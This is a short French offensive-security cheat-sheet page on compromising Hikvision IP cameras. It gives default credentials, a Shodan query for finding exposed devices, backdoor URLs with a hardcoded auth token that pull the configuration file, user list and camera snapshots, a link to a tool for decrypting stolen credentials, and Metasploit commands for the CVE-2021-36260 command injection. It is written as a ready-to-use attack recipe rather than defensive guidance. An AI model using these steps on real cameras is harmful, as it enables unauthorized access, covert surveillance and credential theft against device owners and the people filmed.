📹Camera IP
Hikvision
Identifiants par défaut
admin:12345
Backdoor
Détection
https://www.shodan.io/search?query=%22App-webs%22+%22200+OK%22
Exploitation
Les commandes intéressantes sont les suivantes:
#Extraction du fichier de configuration
http://XX.XX.XX.XX/System/configurationFile?auth=YWRtaW46MTEK
#Lister les utilisateurs et leur rôle
http://XX.XX.XX.XX/Security/users?auth=YWRtaW46MTEK
#Prendre un snapshot
http://XX.XX.XX.XX/onvif-http/snapshot?auth=YWRtaW46MTEK
Pour aller plus loin, il est possible de prendre le contrôle des caméras vulnérables en déchiffrer le fichier de configuration extrait dans lequel se trouve les identifiants des utilisateurs.
ressource: https://github.com/WormChickenWizard/hikvision-decrypter
Unauthenticated Command Injection
CVE-2021-36260: Une vulnérabilité d'injection de commande dans le serveur Web de certains produits Hikvision. En raison de la validation insuffisante des entrées, l'attaquant peut exploiter la vulnérabilité pour lancer une attaque par injection de commande en envoyant des messages avec des commandes malveillantes.
Exploitation
Avec metasploit:
$ msfconsole
msf > use exploit/linux/http/hikvision_cve_2021_36260_blind
msf > set rhost <target IP>
msf > set rport <target port>
msf > exploit
Dernière mise à jour
Cet article vous a-t-il été utile ?